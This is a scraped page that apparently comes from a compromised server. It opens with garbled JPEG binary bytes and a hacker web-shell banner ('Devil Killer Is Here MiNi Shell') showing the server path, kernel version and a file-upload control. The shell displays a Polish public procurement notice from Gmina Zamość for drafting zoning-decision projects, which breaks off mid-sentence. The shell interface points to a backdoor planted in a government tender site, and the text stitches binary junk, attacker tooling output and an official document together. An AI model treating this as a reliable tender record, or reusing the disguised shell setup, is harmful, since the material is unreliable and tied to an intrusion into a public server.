JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250926/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250926/0044509101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie projektów decyzji o warunkach zabudowy dla Gminy Zamość </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Zamość</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950368724</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Peowiaków 92</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zamość</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">843692959</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">inwestycje@zamosc.org.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ugzamosc.bip.lubelskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie projektów decyzji o warunkach zabudowy dla Gminy Zamość </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-25d58cd8-f808-4a77-9bfc-6ea4eea2d926</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00445091</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00072893/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.13 Opracowanie projektów decyzji o warunkach zabudowy dla Gminy Zamość.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gminazamosc <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/gminazamosc</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający, zgodnie z<br/> Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji<br/> oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/> zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne<br/> umożliwiające pracę na Platformie zakupowej tj.: <br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, <br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/> jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, <br/>c) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/> d) włączona obsługa JavaScript,<br/> e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, f) Platformazakupowa.pl działa według<br/> standardu przyjętego w komunikacji sieciowej - kodowanie UTF8, <br/>g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/> lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. <br/>2. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego: <br/>1) akceptuje warunki korzystania z Platformy zakupowej określone w Regulaminie zamieszczonym na stronie internetowej pod<br/> linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący, <br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem. <br/>3. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z Platformy zakupowej,<br/> w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie<br/> oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i<br/> nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 Ustawy<br/> Prawo Zamówień Publicznych. <br/>4. Zamawiający informuje, że instrukcje korzystania z Platformy zakupowej dotyczące w szczególności logowania, składania<br/> wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/> Platformy zakupowej znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: <br/>https://platformazakupowa.pl/strona/45-instrukcje <br/>5. Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne z Załącznikiem nr 2 do „Rozporządzenia Rady<br/> Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w<br/> postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”. Zamawiający rekomenduje wykorzystanie<br/> formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf <br/>6. Oferta oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane<br/> elektronicznym kwalifikowanym podpisem lub elektronicznym podpisem zaufanym lub elektronicznym podpisem osobistym. W<br/> procesie składania oferty, w tym przedmiotowych środków dowodowych na platformie, kwalifikowany podpis elektroniczny lub<br/> elektronicznym podpis zaufany lub elektronicznym podpis osobisty Wykonawca składa bezpośrednio na dokumencie, który<br/> następnie przesyła do systemu. <br/>7. Oferta powinna być:<br/> a. sporządzona na podstawie załączników niniejszej SWZ w języku polskim, <br/>b. złożona przy użyciu środków komunikacji elektronicznej tzn. za <br/>pośrednictwem platformazakupowa.pl,<br/> c. podpisana kwalifikowanym podpisem elektronicznym lub elektronicznym podpisem zaufanym lub elektronicznym podpisem<br/> osobistym przez osobę/ osoby upoważnioną/upoważnione. <br/>Pozostałe informacje w Rozdziale VIII, XII, XIII i XVIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1-3 RODO, informuję, że:<br/> 1) Administratorem Pani/Pana danych osobowych jest WÓJT GMINY ZAMOŚĆ.<br/> 2) Administrator wyznaczył Inspektora Danych Osobowych – Panią Aleksandrę Tokarz, z którym można się kontaktować pod adresem e-mail: atokarz@zamosc.org.pl 3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/> postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji.<br/> 4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy PZP<br/> 5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/> 6) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/> 7) W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/> 8) Posiada Pani/Pan:<br/> a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/> b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/> c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/> interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/> d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>9) Nie przysługuje Pani/Panu:<br/> a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/> Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; <br/>10) Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/> osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.28.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest sporządzanie projektów decyzji o warunkach zabudowy na terenie gminy Zamość, zgodnie z ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2024 r. poz. 1130 ze zm.) i przepisami szczególnymi wraz z analizą funkcji oraz cech zabudowy i zagospodarowania terenu w zakresie warunków, o których mowa w w/w ustawie oraz w obowiązujących rozporządzeniach.<br/>2.	W zakresie realizacji przedmiotu zamówienia wymagane jest opracowanie:<br/>a) ok. 600 projektów decyzji o ustalenie warunków zabudowy (art. 60 ust. 4 ustawy o planowaniu i zagospodarowaniu przestrzennym) wraz z analizą warunków i zasad zagospodarowania terenu oraz jego zabudowy, wynikających z przepisów odrębnych oraz stanu faktycznego i prawnego terenu na którym przewiduje się realizację inwestycji, (art. 53 ust. 3 ustawy o planowaniu i zagospodarowaniu przestrzennym) oraz niezbędnymi analizami i wynikami tych analiz, o których mowa w Rozporządzeniu Ministra Rozwoju i Technologii z dnia 15 lipca 2024 r. w sprawie spełnienia wymagań dotyczących nowej zabudowy i zagospodarowania terenu w przypadku braku miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2024 r., poz. 1116) oraz Rozporządzeniu Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie oznaczeń i nazewnictwa stosowanych w decyzji o ustaleniu lokalizacji inwestycji celu publicznego oraz w decyzji o warunkach zabudowy (Dz. U. z 2003 r. nr 164 poz.1589) wraz z załącznikami graficznymi do projektu decyzji, analizy i wyników analizy.<br/>b) We wskazanym wyżej zakresie realizacji przedmiotu zamówienia, Zamawiający wymaga również opracowania:<br/>	projektów decyzji zmieniających wcześniej wydane decyzje,<br/>	projektów decyzji o odmowie ustalenia warunków zabudowy, w przypadku stwierdzenia po <br/> przeprowadzonej analizie, o której mowa wyżej, braku możliwości ustalenia warunków <br/>zabudowy.<br/>	poprawienie i doprowadzenie do zgodności z przepisami prawa projektu decyzji, w przypadku uchylenia decyzji Wójta przez organ odwoławczy lub sąd. <br/>c) W przypadku wadliwego przygotowania projektu decyzji, Wykonawca będzie zobowiązany poprawić projekt decyzji bez dodatkowych kosztów w ciągu 5 dni.<br/>3.	Zamawiający przewiduje do wykonania:<br/>1)	ok. 300 szt. projektów decyzji o warunkach zabudowy wraz z analizą warunków i zasad zagospodarowania terenu oraz jego zabudowy, wynikających z przepisów odrębnych oraz stanu faktycznego i prawnego terenu, na którym przewiduje się realizację inwestycji oraz projektów decyzji w sprawie zmiany decyzji z terminem wykonania do dnia 14.11.2025 r.<br/>W przypadku przekazania wniosku do opracowania projektów decyzji o ustalenie warunków zabudowy dla inwestycji dotyczącej budowy wolnostojącego nie więcej niż dwukondygnacyjnego budynku mieszkalnego jednorodzinnego o pow. zabudowy do 70 m2, których mowa w art. 29 ust. 1 pkt 1a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U z 2025 r., poz. 418) termin jego realizacji wynosi 5 dni od daty przekazania przez Zamawiającego<br/>2)	ok. 300 szt. projektów decyzji o warunkach zabudowy wraz z analizą warunków i zasad zagospodarowania terenu oraz jego zabudowy, wynikających z przepisów odrębnych oraz stanu faktycznego i prawnego terenu, na którym przewiduje się realizację inwestycji oraz projektów decyzji w sprawie zmiany decyzji z terminem wykonania do dnia 12.12.2025 r.<br/>W przypadku przekazania wniosku do opracowania projektów decyzji o ustalenie warunków zabudowy dla inwestycji dotyczącej budowy wolnostojącego nie więcej niż dwukondygnacyjnego budynku mieszkalnego jednorodzinnego o pow. zabudowy do 70 m2, których mowa w art. 29 ust. 1 pkt 1a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U z 2025 r., poz. 418) termin jego realizacji wynosi 5 dni od daty przekazania przez Zamawiającego<br/>4.	Zamawiający zastrzega, że podana planowana liczba projektów decyzji stanowi wartość orientacyjną, a Wykonawcy nie przysługują względem zamawiającego żadne roszczenia w przypadku zlecenia mniejszej liczby opracowań. Wykonawcy zostanie wypłacone wynagrodzenie za faktycznie wykonany zakres prac. Wskazane wyżej ilości mogą ulec zmianie w zależności od faktycznie złożonych wniosków.<br/>5.	Dokumentację projektów przedmiotowych decyzji należy przekazywać w jednym egzemplarzu w wersji papierowej i w wersji elektronicznej tekstu decyzji i analizy w formacie .doc<br/>6.	W ramach realizacji przedmiotu zamówienia Zamawiający:<br/>a)	wymaga osobistego stawiennictwa w siedzibie Zamawiającego nie rzadziej niż raz na dwa tygodnie w celu odbioru wniosków o ustalenie warunków zabudowy i zagospodarowania terenu oraz dostarczenia wykonanych projektów decyzji,<br/>b)	zastrzega, że w przypadku odwołania się którejkolwiek ze stron od decyzji, Wykonawca jest zobowiązany w ramach niniejszej umowy do przygotowania w przypadku konieczności wydania nowej decyzji, projektu tej decyzji, za co nie przysługuje dodatkowe wynagrodzenie.<br/>7.	Istotne warunki umowy:<br/>- Wykonawca będzie sporządzał projekty decyzji będących przedmiotem zamówienia,<br/>- koszty związane z przygotowaniem dokumentów do Wykonawcy poniesie Zamawiający,<br/>- koszty związane z przygotowaniem projektów decyzji i dostarczeniem do Zamawiającego poniesie Wykonawca.<br/>- Zamawiający zastrzega, że podana planowana liczba projektów decyzji stanowi wartość orientacyjną, a wykonawcy nie przysługują względem zamawiającego żadne roszczenia w przypadku zlecenia mniejszej liczby opracowań. <br/>- Wykonawcy zostanie wypłacone wynagrodzenie za faktycznie wykonany zakres prac. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71400000-2 - Usługi architektoniczne dotyczące planowania przestrzennego i zagospodarowania terenu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71410000-5 - Usługi planowania przestrzennego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-12</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Kryteria oceny, ich waga i sposób punktacji dla każdej z ofert niepodlegających odrzuceniu:<br/>Lp.	KRYTERIUM	Max. ilość punktów	Waga	Max. ocena w kryterium<br/>1.	Cena oferty	100 pkt	60%	60 pkt<br/>2	Doświadczenie Głównego Projektanta 40%	40 pkt<br/>2.	Wybór najkorzystniejszej oferty nastąpi zgodnie z ustawą na podstawie powyższych kryteriów. Zamawiający zastosuje w ocenie zaokrąglenie wyników do dwóch miejsc po przecinku.<br/>3.	Ocena ofert w poszczególnych kryteriach będzie dokonywana według następujących zasad:<br/>1)	CENA OFERTY - to cena brutto, zgodnie z zał. nr 1 do SWZ, określona do dwóch miejsc po przecinku. Ocena ofert w kryterium ceny będzie ustalona wg wzoru:<br/>C = Cmin/ Co x W<br/>gdzie:<br/>C – ocena w kryterium „cena oferty”<br/>Cmin - najniższa proponowana spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu „cena oferty”<br/>Co - cena oferty ocenianej<br/>W - waga w kryterium „cena oferty”<br/>2)	DOŚWIADCZENIE GŁÓWNEGO PROJEKTANTA<br/>W kryterium „Doświadczenie Głównego Projektanta”, Zamawiający przyzna punkty, jeśli Projektant wskazany do wykonywania zamówienia posiada doświadczenie.<br/>W ramach oceny tego kryterium Zamawiający przyzna punkty za doświadczenie Głównego Projektanta wskazanego do realizacji zamówienia, polegające na wykonaniu usług obejmujących sporządzanie projektów decyzji o warunkach zabudowy i zagospodarowaniu terenu wraz z analizą.<br/>Ocena zostanie dokonana w oparciu o przedstawione przez Wykonawcę oświadczenie dotyczące doświadczenia osoby wyznaczonej do realizacji zamówienia.<br/>Punktacja:<br/>•	40 punktów – jeżeli Główny Projektant wykonał co najmniej jedną usługę, w ramach której sporządził 201 i więcej decyzji, <br/>•	20 punktów – jeżeli wykonał co najmniej jedną usługę z zakresem 175 – 200 decyzji, <br/>•	10 punktów – jeżeli wykonał co najmniej jedną usługę z zakresem 150 – 175 decyzji. <br/>Punkty nie sumują się – Zamawiający przyzna punkty za najlepszą jedną wskazaną usługę.<br/>Maksymalna liczba punktów możliwa do uzyskania w tym kryterium: 40 punktów.<br/>Wykonawca, który nie wykaże się wykonaniem żadnej usługi zostanie przyznane 0 punktów.<br/>Punkty w powyższym kryterium zostaną przyznane na podstawie przedstawionego w ofercie doświadczenia, w oparciu o oświadczenie zawarte w formularzu oferty, dotyczące wykonanych opracowań przez osobą wskazaną do realizacji zamówienia. Maksymalna liczba punktów, jaką w tym kryterium uzyska oferta wynosi 40.<br/>4.	Ocena każdej z ofert, jest to suma punktów uzyskanych za wszystkie kryteria wymienione w ust. 1 i 3 wg wzoru: P=C+D<br/>gdzie:	<br/> P – suma punktów<br/>C – ocena w kryterium „cena oferty”<br/>D – ocena w kryterium „doświadczenie Głównego Projektanta”<br/>5.	Z zastrzeżeniem ust. 6 Zamawiający wybierze Wykonawcę zamówienia, którego oferta:<br/>1)	odpowiada wszystkim wymaganiom przedstawionym w ustawie Pzp;<br/>2)	odpowiada wszystkim wymaganiom przedstawionym w SWZ;<br/>3)	wiąże Wykonawcę zgodnie z rozdz. XI SWZ (lub Wykonawca zgodził się na przedłużenie związania ofertą lub nastąpiła okoliczność, o której mowa w ust. 8);<br/>4)	została uznana za najkorzystniejszą w oparciu o podane wyżej kryteria wyboru.<br/>6.	W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że co najmniej dwie złożone oferty uzyskały taką samą łączną ocenę wybierze ofertę o cenie niższej.<br/>Gdy zaś również ceny ofert będą takie same - wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą 